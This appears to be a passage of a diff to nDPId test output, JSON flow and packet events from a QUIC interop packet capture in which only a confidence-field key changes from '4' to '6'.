mGrN5z9mmI7+cQWr+bnYAVDEJN4rmkUxjOxyuiiOc+eUaT617fUn1I8bpVOZvNmAr\/m0w4TmV040UAJX8kNuv73I76cuzAXTqPGp1OIlB8p\/rUaLeRtwOv26NjRPMlDjdM\/2\/Ilg8tpUGW7j\/eqU5QmqHo\/Tiz3kNBpIfGMBMuOWA\/+PbBvi4AgIZ5msvRnQ6tvRm+GWBEDzs\/IRYnKTailefoHxjXB0DNFDc4zDa+tiGPQt7PmYE5fk8D2cP4OlLJtPGya0qenuuBZpE+9egccg6vsbROrFnslZRL6+0pFRqbKJZSvkqUbHUrlE\/JfB\/RdVa6sOFQkyGbFLPZtdG76DZnk7EFNB+78rrmYjzs6QdbL0HyurZ1UeWbBWI2fQCt4n30u475\/uIDFvQNfHznThYw1T3lHUvAqHOyJ\/ccQ7CPkJlpFBs41COx+7rd4GKmxiD62jg+b4QoriC8bYd6M7zXH9NxgT2wgi7+ApxeYKupXdFHK42Vnp2KF58erKh\/QyLOmaga5TR43mFPJ1U4Glvlilv1YLFtMnz+s5m3xpG9nXQX\/uLnoR+QzZ7ZpahZpcCH3jpOUBrBQLDS3SRPYGHiIfQ3MTxt\/K2HL9xf8n7chjG+XDpVfD+Ow4ZDOisoboLR0pMTJoCSzc7NiqX5QJC8lHEJcQJ84dLF0V8eZdiDwD0a\/E3DacaQJIW+8v0unPtOxdaQoXsSVsGNysZHm0clQcBwxWaX8rC0w=="} -00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1603816434601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434601,"pkt":"PKn0qB\/spJGxgjQ5ht1gCaFmAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVHH8QAfHOHYAAAAAAAIMG1gGePLGT0KGio6\/wAAHQ=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1603816434601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434601,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAQM5AAEARcbfAqAGAjOM0XJOYAbsE7P6myAoKCgoI8EYvtCcjifcAAETSFB6sl\/lkLZ53JqQdlE2I446feeWqsyvCToqdH\/63WgFZXzAd5XJaz2hSlpGEY3otY+eR2fXJeeeLgKjgc1xdXndquYfP60ARoUpa1CNURQDv3dVUcZH4ZRr7gXB5ZoVF7\/jeJ12Vn6muRxM8UUAONwgdRKDgiL0UJP4xo5\/U0EJMBAoIApMkTic7rgG2Bh+mE0INS4tt2YDtZQWRkNwxdusXBvMW5Xh6sJWHpZCpVde45Vj8XrkpX2zzc2M+YhMwcBgNKHixMOLCc1OsZDjp+pVjqtaNwuJrMIuOI6usSTI66JX+7JfjdPq7itf0ZF7lYG6PNEEU+xPizRn2KxsuDnIqtilwE+LUxpsYFKfGcG5ezqqO6yKGneF+EwF1DUUwFWNzaP0yDVP0V7O256HNYYY9PS+2D1mPJ5Qh2m7ZEHCUVkRSNQ2ShIsxlvawRDyCp6kGwT\/WLvCLzHx+eyBaO007Tt\/wxiyopmu\/PGttRCmy1mbey1xkep6SVHg2hljMI2kKhPkHRByGHf4LjQ5nMnAXf0Tq9kl8M9jkU3GAPVgFzvq3cQiBPTdYAx\/xzWiHb6MZotlQJrKtj8r5btIK5VkYbo4NO\/HZLmSzj+v2qCIKxc1Kk9zuPTC3cbP50XiuLwGkNCPCfW+6OO5M9kmhEpBXsPSz70fHx0\/0D2eDDtF18PM3Frvb1Fy16GhVoNeVMEwWNkS3FwumWjt1NyRbw4LvKt\/Rmj6KQiUZvu7MbT1ndIcWoPm+a9vrINvQyHbJftHfdf2llfXEA9XL2i2KvpzX8iugx8h\/EwmNNUg0F+x1PWifXySR9l8Caxeyeh8E9jH293IxSPPA935LAymnnfgPtyfd1UPNS9YuR73IJfEhrnUAjx6P8XPDbcP+xgeY76YS+U3MH7XP1Q4EtbU2P0qKkUuklKbSr5dA\/KAEw+eLuqUjqAIZj+rndafIhO\/LsQfPYOW7bdEx4iMsGisRcOkkgcehuB399WIzJNDaiUudf5GjJuMlrlW6TLhJ\/g11dD2dIjh8WIkp4Qn0ZkpnSlcQsZ6BaomyP1UZMobw7Gb2Mj8fiVHGtut5pXwWsRBQRFeBEEDjwKjkFEFJa+NTqaiorO29xYtpR57ookqNhP\/dfrYv88CXL7XheZvTVIEYcH\/93v+Cx7XpZlqq9qM40K8mUb2GtWK8vMCP6sNaXS5hLGz84Ddirh9wD6+wfnjrttIpQkYIn\/n0QN2b1TKqZ4lV4cVP\/FewN5U4p+laZISTDvXTwJ40b2O71mGyXFIkSolo8eu55u2aHixwNCDhO56mWWHK4Sjf79khIgUIR39vcpUSQ6FVfGU5puW13EEw+81VUTMmbCdmBMwZ08nDTbGTXvAz8fOGdlwm11FF6ZM3uLiRXp1gGZjK30iogDlgUho8fiLM4+4Funma+wzaEJShb\/ISV4iTPJc+5A6A\/ef2opV+jxdSnTVcIVgMqB\/J2pk14MFTuYdq1mbrGXTX4\/KzcWcwz8+SNndOIz9Wc7K5XCuPKwn0ey2jndDMY01z6moJcN3uM0nJF8eHMcSe6+CbejSVpzM5ThvLdtFQ+ViAhGrDwX9+mUtbkulWDQiHIxtnNa+G+LGQ1ouuwgszH64VBoxich6WLV\/F59MlHS\/lRQ=="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434601,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434601,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00647{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1603816434602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434602,"pkt":"pJGxgjQ5PKn0qB\/sht1gCm9\/BNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmd7jcRUQTYoyXJCgoKCggXpMPD7IbgFwAARL6WX\/ntaXcB2j6uyN\/eyiy9Z65LFFuHMHqjLQFwZXwPmrbwF1D9AvrfhiGZgRDKOtshDVcv\/5o63Mt5lp96z15M3u52GksY8IeFOYZFLzRLSypCHdSUAudS4QYS9yvJF11P6aEq9v5\/cYDKzMAnbW\/\/2YzVVKyxaNwCoqy+9J2FpElrzMoylxHY8jGmzsLZt+Cq4S6W5A\/yie2rgPdsV\/\/kadibCJuYe2QgLqw+NgOvs3ZCW318tssCX9NeufGXtdg+E7g9jwjM+K4Ord93OwDnRF2aTJmHo2tCEGjCWFEkbK0aHLxzz+KabEo0\/LETVbiLPpKC44rKQXGCZ7Lmqskpi4aWMEcEh2AyNzzT6UX+VTMz2bzdgqFYxEdMOkTF8mZvPnsAyl5GsftpRvrRDq4JM2HS2xjqKNf8\/rk9IDD2z1lCuhYklz6u8Xh8AV2CVmPjku7CduxRqf8iWhU3IZh\/tB0Zovqp1ibQbIYt4zrU3MxUs0Ann688P+rb7y+ZsnFu\/fk+h6xbT\/viYivE\/uJYhISmd0y\/Ibw7oVkhUvcwYGe6BlxHbu9DCl0q2k0qM2EbRuJ7WjnFFIsOxPhC8cKRdPoM0zznMb98kz5ysAdYKg+SkdeKd+4pa4gn+PgKnZ1v9QHbHVyu18amv\/ydgTDP9BOE5otsm9Ste64D+uoB3LV0jr7gSVBlTP43OHoBDZrEnIZWNb0IXAfnfRqK5U1mX9jYgyrjMmaabtaW5SNCjpVcHvLrXXfdvgnhoksaNA8gqrNxl8kTwyqsCW0T9SKJrw9GgmLUZOOEXkBCdtDC8Rwy2m5YGCQMlqBCp9fcD7R7OWZl9re2KtmbZcx5XuRoJK+Ee\/RcP8U39Qot\/kENeJ0xwBwp0WES98qMbpvwX+NXwrulmff5OZz7s0aOup6\/XRoJevNt6uaC\/AmTv08qFISr1ifH4eiMCq2kmxW2ahH9hEVWZR3Jxv9iJSCKrtvEkXwyQlIE2Ox6SYeipj2kQe7zZek+5dXGQsbScMIja5ekSaVy1D8rj1LjvpGiPeJY1UasRXnpVF59+PQLwsfANope5yQlCx+YVECOLk0\/GMBEoIlKIoZLqVJG\/C0u7wyX+2E6ZdHmRDFkH6mFBgjUTGXKtzBCjRac0BnMVz9YKLNQsd+\/rrsH5pxJ9YO0MuiSwIPs+xpIdo\/IEERboBN3aoJgydQ37ceY80ila+nQ3U9dSxR06jfC77UBEfVmdzlkuL\/DhQFWPNRfInKTTvG3yav2KKHl1x8TO6Ii\/6UZ\/zxT\/dSPlF2U3u1lI3XWOna6XPE0cHG4jVhbs8Y9WhQwEhQEXLQePEz9F2uVXMGjij63Ico7971IAKm6HyBzRv2Z2ImKjQZ0Rn1bzFvrV1KmJeslV3i9\/gn2wrszpq9ZZiQligWna9g2XDzA9fJDQnnBdg+QtaCieo2h4UjfZlagVCzJE5jJiKvMJjSG+vhOBRM\/pLtSq8qtMvvY3qHtTPn5\/9+fdA0SINWbW8xs11auU+NEYm5CyZ4WhnBvSSN8gec+a6gg9j80lhWWSEnL5q+wUaDeIovDUJ\/pMAff2X2gN+lfmO\/YkWJGLKHp\/WpzMbzWOkNBwTL8XEECXXPg9Q=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434602,"flow_last_seen":1603816434602,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434602,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbNAAEAR5fDAqAGAwb4KYsH6AbsE7KsqzQoKCgoIc5O0PcfI+J8AAETS5F5\/qillFB34ZBYonPftxqjX8kBkyIk23lkZ2qSswRv0KEUWFyy4088Os3ZnRrOQrOwaYeXZhHaUBeXrptUSJZkTrnEJcyoWV9p6dEfGmv7bCjVxnlCwVoAAaJG8GHsjcbwBPQJPZ6oZM5lf6cBUHAqYHNw6rDSUKD3xvkDAy0tLs96F9A7S0NsDa6ZvGzs91gfUUlnKUaJulVEVfMWbhAjpxgUG+FXt9Oo9sL+OPkMVV\/7Vt0yoW1XaITbIq8KI8LwQAzQXNX+v7kBeFwKwuJRDs2d2j85QUWSVVg6OehxN0oTkJ\/iEWaH7HwRGKNP3wBEMihP+3wB41yI1iprDNfCK26psAUg8WkevVXjHCw\/1R8rXTAqTx4QwA+k906j11b35dxI9YbrIjP9IU\/OcLYQFjdfqfddeEH8L8+SaTdDj+FCEgqbdUYwvn3ShJJ8oqSXEByw1fDw6a6R8YQY\/NcWHQmWlwZV\/s8V6pCK5XJBFoyooYlTtK5HT3AzggQdsGSXTc5vPgI9QOgVcbjbdWp2Amvc9V\/q1oTUYUqgUbgO29365V32Dune0xvsiGBLhkxW\/xB2VR3VD8bIGBOkyav0B7u323dLTivvutQgLSxIpoC002ajbvnwVNbm1ZcAbWyBNcs3+OXM\/vE9S84TFCziB6d7oYbaE4yI6WoMFbiyLE0HiXUYenUnbBg82zVNaZ30wtH7\/mEwwYXBlHw79PgUwLtAbNWwFraM3BZwEm3JyH67VIsyLo7T55Cx3r9oakgfDnsS6P4bT5c4dkQ6l8BLSFIYKSUtqpqBbExMHSrqaMXKXu8BL\/5ieVLJhNsi\/slQ9w5NDtQoTTbDkDU1uXliwiII\/d1kCgsYupKOqyL1yOQzPZKCInlHZsUbMdJ7y8bMnF2vGBX4GG5L01jtQDpBD38uCXLmnzO+9c3yuX3Qh5zcfT34vJRSeWP4va7S\/nOP4nZYATnqlIGSv\/xJzfLmDB79k6IefwfU2xRise5mIw2N37hs+9xRHmkwSbEY658tuxL8Xb1MtKxUQDPq8BcSvLe9eQOWinR94+9pJhj3IXfg8WmTW3\/5K+B\/rN2gnFxD27OZ+9NCOJP8NZ6N\/BTFtZSfdJJpZYHIN8TnZLxRlID54H\/GDdCUsJNUfhoKrsuqdCGDfNktOUx0MVrR62a0uRztIF8liJfUeO\/\/KAKR5QW14obLuVSayoUimbOEHLMJCVQc8\/yVQYizs3KLKMpIRLych5r0TNMP6kwhIq3oRLx1tuGXR5Ce8Ty5Ru0TOGnc5fQ50Lqs6GkZSf0wsPD2nX6txa8FkQa+B66L7AJOYLxiX+7eCvInUvChFc+0Sb+WrPE+4s+jAEcZnUDM2coA7EAkqHnQ9J+lIjWQPxMKhSjx58dKOyLuMftDrpApD9cIaKdSgopyq44a5UIqEi1D2XHwo6tGidN7YNyIAutBBxF5IsroY6pOfcfi2fwuYnSzbutfHvCf8YirR\/BAaLMu3aNHHB\/ZKPVZpI\/gucAgFFvFH\/M+\/qty4rxYviGGCAa3\/53kY+NHOxljIVMDVyWE9T\/sqE0XTooS\/SgQ38mqYWA+WDPfMqjhyITNqp6FmsU\/gt0JrpoezFzEe61zJNnCelVJXtRUHkhDcxRW2fFs7Rw=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1603816434606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434606,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUATrtAAEARiKTAqAGAg58YxqJzEVEE7I\/AwQoKCgoICpCmEqV\/5+UAAETSrUzMAXsH+lNXSQbnFrAyl7ceSEtrPkuYxRTLDdaFiiLmduk9Xs2lXgYzbsBek6Ac79LMu0h2S0VMLhMIoynub2oycJvB5K8wYKEeSkLlTvDrT+4\/PAaXju5wh72tiJmArJiM37yh+0ZsoHgCUSqF0WzYygVii9e2gqRAE3tVIHQjG+5jZMLcaJ2yFfHfBMxd\/O6jX\/qLUotOaY1vFKrUIY90\/U9Dbi4MsFuL6Z4A02fTqtuX4r21R2SazEf5RJES7hcKSmvCokMZmOKlyLilXCKYcenmZhN8UNa3xfFEIcmY5JwTnC3sMsOo\/rBS\/9H1GO4ZE3+cPgE5zkXgqeuWBcFKNYDy7D\/WFSz1wdWlgFLSW2hrnDFcjH74QFpHFNYSLfoZVnrmXaJWdYqR3\/GrunzyfQ5NLPD0xfrMvW+mfxDdvmFWlM5+TRdKLnFtqU5+MG9orjbkU4chKQtFPiEcFOtk8NTHDHAGDTwbYffqe87exnYOpkIf3ZSAN+Xc6uclNDmRl6vRFeIZ7wnFa\/vovEOpHWQnRJdHbza2NFUFRaTbJ66fHDPe80KPiiYdWaTjiZGLbnVxj5cnNPjgcS9riI0x\/vjDtGbui32zd2k19XAk8XSvXovnq\/N1aEblwY4nUP5VKVuQkxHivQFDAXb94K1J5M36udsQd6LdTQRFPp1uq8xtKCFuK6p8iHZhrHLCcSPXYOeddA4eGHDK9as2MSP81cihu\/T7DLy1YjlKcHYzDa3yx1xCoO5FKkG6fm9bswGYlU\/+baDbYfTkQsLCEaPlRnxA9WTERJJ+MSFDRHu\/PlPFJ7insUQmyVmaD3hw4umIBuOag4GPXKlW2orVcqPhx98PvrVSXrWoJ9fVfyaRdjVGS9oRlA6aO0YTRViOTKSEUuyp112T1TQFZCnuDnAkxVoRPmo9aTNWuTZ9TG1q3dK8ixFuLxOAzdvDCKb+Mw\/ATbe3lk+yLwq8IFMq6jKdrgufqcgEK\/DE45uK6DkeDtg2Nfk41dXE6E2W06tsmVdvKzE9ZnBhUhe2ejOTPCQOMOhKKxW1gu5IyfCpHbjJN2vfvhyPN0OnZybFzDxqcGmwjQ+YG+BTWqim17tKyUSWvtfljnxHMSsPqRy6Y6NfBCNp1aUpwRPLdmmujG8IVPEXIU\/kof9d0KApSsa1g5\/lxQVV6EBiKhgM1boWQ5RBl6ra1rwDg1yBBAJS3flCp5HcSZz1flGcqFaVEsVrUVz+AEXY9ruE1orPMbY+wl+lHasmZLW74cTNm+UINmjH3A+DsXhcmXvfEm5hNNThZ\/NnJpbpD4NH5H02TzCShSKgJ69RlVFghhhWba9V1v0pJT8dy2Wkw9Ko6Pt9n7LOTgLjbmfTwItWhZTZuppOfwln5Ay+ujYsECxELS1meSTPXMgPFm5ZqFNUQ4ewBWDBiyF0UuaCFEJLCwQMzr3L1MCmNTV6WeniY70fageRh2KTa3ox9TKmffiA5zTBLt8Z7BCR5or8UDQn5nVW9FpnezChyvtJGlUcukrf1\/2Yv6T6Ix+RUzOFNkHL\/DYqhcyt5IZvOgg9EpYeiSpp\/jf5smjFh0ytesmJY86N5x+rphh2jl\/Hh13FoM1EltzV1MqIusbwoLTLdDb5Z6FDqYBCG0rctA=="} -01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 